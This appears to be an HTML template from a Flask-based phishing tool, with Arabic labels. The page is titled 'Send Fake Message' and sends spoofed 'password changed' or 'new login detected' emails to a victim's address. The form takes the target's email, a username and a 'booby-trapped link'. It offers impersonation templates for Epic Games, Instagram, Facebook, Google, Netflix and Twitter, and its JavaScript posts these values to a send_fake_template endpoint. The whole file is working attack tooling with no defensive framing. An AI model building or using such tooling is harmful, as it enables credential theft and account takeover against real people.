<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title>Send Fake Message</title>
    <link rel="stylesheet" href="{{url_for('static', filename='css/font.css')}}">
    <link rel="stylesheet" href="{{ url_for('static', filename='css/simplebar.css') }}">
    <link rel="stylesheet" href="{{ url_for('static', filename='css/feather.css') }}">
    <link rel="stylesheet" href="{{ url_for('static', filename='css/select2.css') }}">
    <link rel="stylesheet" href="{{ url_for('static', filename='css/dropzone.css') }}">
    <link rel="stylesheet" href="{{ url_for('static', filename='css/uppy.min.css') }}">
    <link rel="stylesheet" href="{{ url_for('static', filename='css/jquery.steps.css') }}">
    <link rel="stylesheet" href="{{ url_for('static', filename='css/jquery.timepicker.css') }}">
    <link rel="stylesheet" href="{{ url_for('static', filename='css/quill.snow.css') }}">
    <link rel="stylesheet" href="{{ url_for('static', filename='css/daterangepicker.css') }}">
    <link rel="stylesheet" href="{{ url_for('static', filename='css/app-light.css') }}" id="lightTheme">
    <script src="{{ url_for('static', filename='js/givt.js') }}"></script>


  </head>
  <body class="vertical  light rtl ">
    <div class="wrapper">
      {% include "nav.html" %}
      <main role="main" class="main-content">
        <div class="container-fluid">
          <div class="row justify-content-center">
            <div class="col-12">
              <h2 class="page-title">
                <i class="fe fe-message-square"></i>
                &nbsp;
                أرسال رسائل انتحال
              </h2>
              <div class="row justify-content-center">
                <div class="col-md-6">
                  <div class="card shadow mb-4">
                    <div class="card-body">
                      <p class="mb-3"><strong>ارسال رسالة ملغمة</strong></p>

                      <div id="show_alert"></div>

                      <div class="form-group mb-3">
                          <label for="example-select">البريد الخاص بك [ المرسل ]</label>
                          <select disabled class="form-control" id="example-select">
                              <option>{{ email }}</option>
                          </select>
                      </div>

                      <div class="form-group mb-3">
                        <label for="target_email">البريد الخاص بالضحية</label>
                        <input dir="ltr" id="target_email" type="email" class="form-control">
                      </div>

                      <div class="form-group mb-3">
                        <label for="username">اسم المستخدم</label>
                        <input dir="ltr" id="username" type="text" class="form-control">
                      </div>

                      <div class="form-group mb-3">
                        <label for="hack_link">الرابط الملغم [ بيكون في الرسالة ]</label>
                        <input dir="ltr" id="hack_link" type="text" class="form-control">
                      </div>

                      <div class="form-group mb-3">
                          <label for="template">قالب الرسالة [ Fake Template ]</label>
                          <select class="form-control" id="template">
                              <option value="epic_games_1">EpicGames ( The Password has been changed )</option>
                              <option value="instagram_password_changed"> Instagram ( The Password has been changed )</option>
                              <option value="facebook_password_changed">FacecBook ( The Password has been changed )</option>
                              <option value="gmail_login_detect">Google Login ( New Login Detect )</option>
                              <option value="netflix_changed_password">Netflix ( The Password has been changed )</option>
                              <option value="twitter_changed_password">Twitter ( New Login Detect )</option>
                          </select>
                      </div>

                      <div class="col-md-12 border-top py-3">
                          <button id="sub" onclick="send_message()" class="btn mb-2 btn-primary btn-md btn-block">ارسال الرسالة</button>
                          <button id="show" onclick="show_template()" class="btn mb-2 btn-outline-primary btn-md btn-block">عرض الرسالة قبل الأرسال</button>
                      </div>
                      <script>

                        function show_template(){
                          const TargetEmail =  document.getElementById("target_email").value
                          const TargetUsername =  document.getElementById("username").value
                          const HackLink = document.getElementById("hack_link").value
                          const Template = document.getElementById("template").value

                          if (TargetEmail && TargetUsername && HackLink && Template) {
                            const data = {
                              TargetEmail: TargetEmail,
                              TargetUsername: TargetUsername,
                              HackLink: HackLink,
                              Template: Template
                            };

                            fetch("{{url_for('main.show_the_fake_template')}}", {
                                method: 'PUT',
                                headers: {
                                    'Content-Type': 'application/json'
                                },
                                body: JSON.stringify(data)
                            })
                            .then(response => {
                                return response.json();
                            })
                            .then(response => {
                                if (response.error){
                                  show_alert(response.message, "error")
                                  return 1
                                } else{
                                  const newTab = window.open();
                                  newTab.document.write(response.template);
                                }
                            })
                            .catch(error => {
                                show_alert(error, "error")
                                return 1
                            });
                          } else {
                            show_alert("جميع الحقول مطلوبة", "error")
                          }

                        }
                        function send_message(){
                          close_button("sub")

                          const data = {
                            TargetEmail: document.getElementById("target_email").value,
                            TargetUsername: document.getElementById("username").value,
                            HackLink: document.getElementById("hack_link").value,
                            Template: document.getElementById("template").value
                          };
                          fetch('{{url_for("main.send_fake_template")}}', {
                              method: 'POST',
                              headers: {
                              'Content-Type': 'application/json'
                              },
                              body: JSON.stringify(data)
                          })
                          .then(response => {
                              return response.json();
                          })
                          .then(data => {
                              if (data.error) {
                                show_alert(data.message, "error")
                                unclose_button("sub", "ارسال الرسالة")
                              } else {
                                show_alert(data.message, "success")
                                unclose_button("sub", "ارسال الرسالة")
                              }
                          })
                          .catch(error => {
                            show_alert(error, "error")
                            unclose_button("sub", "ارسال الرسالة")
                          });

                        }

                      </script>
                    </div>
                  </div>

                </div> <!-- /.col -->
              </div>
            </div>
          </div>
        </div>
      </main>
    </div>
    <script src="{{ url_for('static', filename='js/jquery.min.js') }}"></script>
    <script src="{{ url_for('static', filename='js/popper.min.js') }}"></script>
    <script src="{{ url_for('static', filename='js/moment.min.js') }}"></script>
    <script src="{{ url_for('static', filename='js/bootstrap.min.js') }}"></script>
    <script src="{{ url_for('static', filename='js/simplebar.min.js') }}"></script>
    <script src="{{ url_for('static', filename='js/daterangepicker.js') }}"></script>
    <script src="{{ url_for('static', filename='js/jquery.stickOnScroll.js') }}"></script>
    <script src="{{ url_for('static', filename='js/tinycolor-min.js') }}"></script>
    <script src="{{ url_for('static', filename='js/config.js') }}"></script>
    <script src="{{ url_for('static', filename='js/apps.js') }}"></script>

  </body>
</html>